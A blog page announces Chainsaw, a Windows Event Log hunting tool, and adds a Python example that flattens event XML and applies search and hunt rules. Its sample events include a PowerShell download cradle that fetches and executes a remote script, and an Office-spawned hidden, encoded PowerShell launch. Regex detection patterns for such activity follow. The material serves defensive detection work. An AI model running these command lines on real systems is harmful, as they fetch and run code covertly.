Securehat
@FranticTyping
Chainsaw Tool - Search and Hunt Through Event Logs
A few months ago I wrote a tool in my day job that helps analysts to search and hunt through Windows Event Logs. The relevant blog post and tool links are below.
Original Blog Post: Chainsaw (F-Secure Labs)
GitHub Page: countercept/chainsaw - Rapidly Search and Hunt through Windows Event Logs (GitHub)
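The page only points at the tool, so the following is an added illustration of the kind of work "search and hunt through Windows Event Logs" means in practice. It is not Chainsaw's code and does not reproduce its rule format or CLI; the records are constructed in the XML shape Event Viewer and wevtutil export, and the rule format (a name plus a set of regexes that must all match named fields) is a simplified one invented for this example.

```python
"""Search and hunt over Windows event records exported as XML.

Added example, not Chainsaw's implementation. Events are flattened into
dotted keys (e.g. Event.System.EventID, Event.EventData.ScriptBlockText)
so that a search can scan every field and a hunt rule can pin specific ones.
"""
import re
import xml.etree.ElementTree as ET

EVT_NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

# Constructed sample records (not captured from a real host).
SAMPLE_EVENTS = [
    # Benign PowerShell script block (4104)
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-PowerShell"/><EventID>4104</EventID>
    <TimeCreated SystemTime="2021-06-01T10:00:00Z"/><Computer>ws01.corp.local</Computer></System>
  <EventData><Data Name="ScriptBlockText">Get-ChildItem C:\Users</Data>
    <Data Name="Path">C:\scripts\inventory.ps1</Data></EventData></Event>""",
    # Download cradle in a script block (4104)
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-PowerShell"/><EventID>4104</EventID>
    <TimeCreated SystemTime="2021-06-01T10:05:00Z"/><Computer>ws01.corp.local</Computer></System>
  <EventData><Data Name="ScriptBlockText">IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')</Data>
  </EventData></Event>""",
    # Benign process creation (4688)
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4688</EventID>
    <TimeCreated SystemTime="2021-06-01T10:06:00Z"/><Computer>ws02.corp.local</Computer></System>
  <EventData><Data Name="NewProcessName">C:\Windows\System32\notepad.exe</Data>
    <Data Name="ParentProcessName">C:\Windows\explorer.exe</Data>
    <Data Name="CommandLine">notepad.exe notes.txt</Data></EventData></Event>""",
    # Word spawning encoded PowerShell (4688)
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4688</EventID>
    <TimeCreated SystemTime="2021-06-01T10:07:00Z"/><Computer>ws02.corp.local</Computer></System>
  <EventData><Data Name="NewProcessName">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
    <Data Name="ParentProcessName">C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE</Data>
    <Data Name="CommandLine">powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A</Data></EventData></Event>""",
]

# Hypothetical rule format: every listed field must exist and match its regex.
HUNT_RULES = [
    {
        "name": "PowerShell encoded or download cradle script block",
        "where": {
            "Event.System.EventID": r"^4104$",
            "Event.EventData.ScriptBlockText":
                r"(?i)(-enc(odedcommand)?\s|FromBase64String|Invoke-Expression|\bIEX\b|DownloadString)",
        },
    },
    {
        "name": "Office application spawning PowerShell",
        "where": {
            "Event.System.EventID": r"^4688$",
            "Event.EventData.ParentProcessName": r"(?i)\\(winword|excel|outlook|powerpnt)\.exe$",
            "Event.EventData.NewProcessName": r"(?i)\\powershell\.exe$",
        },
    },
]


def flatten_event(xml_text):
    """Turn one event's XML into a flat dict of dotted field names."""
    root = ET.fromstring(xml_text)
    fields = {}

    def walk(node, prefix):
        tag = node.tag.replace(EVT_NS, "")
        key = f"{prefix}.{tag}"
        if tag == "Data" and "Name" in node.attrib:
            key = f"{prefix}.{node.attrib['Name']}"  # <Data Name="X"> -> ...EventData.X
        else:
            for attr, value in node.attrib.items():    # e.g. Provider.Name, TimeCreated.SystemTime
                fields[f"{key}.{attr}"] = value
        children = list(node)
        if children:
            for child in children:
                walk(child, key)
        elif node.text and node.text.strip():
            fields[key] = node.text.strip()

    for child in root:
        walk(child, "Event")
    return fields


def load_events(xml_records):
    return [flatten_event(x) for x in xml_records]


def search(events, event_id=None, pattern=None):
    """Search: optional EventID filter plus a case-insensitive regex over all field values."""
    hits = []
    for rec in events:
        if event_id is not None and rec.get("Event.System.EventID") != str(event_id):
            continue
        if pattern is not None and not any(re.search(pattern, v, re.I) for v in rec.values()):
            continue
        hits.append(rec)
    return hits


def hunt(events, rules=HUNT_RULES):
    """Hunt: return (rule name, record) for every record satisfying all of a rule's conditions."""
    hits = []
    for rec in events:
        for rule in rules:
            if all(f in rec and re.search(rx, rec[f]) for f, rx in rule["where"].items()):
                hits.append((rule["name"], rec))
    return hits


if __name__ == "__main__":
    evts = load_events(SAMPLE_EVENTS)
    for name, rec in hunt(evts):
        print(f"[{name}] {rec['Event.System.TimeCreated.SystemTime']} {rec['Event.System.Computer']}")
```

Flattening the XML first is the design choice worth noting: search wants to scan every value an event carries, while a hunt rule wants to address one field unambiguously, and a single dotted-key dictionary serves both without re-parsing.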
Last modified
2yr ago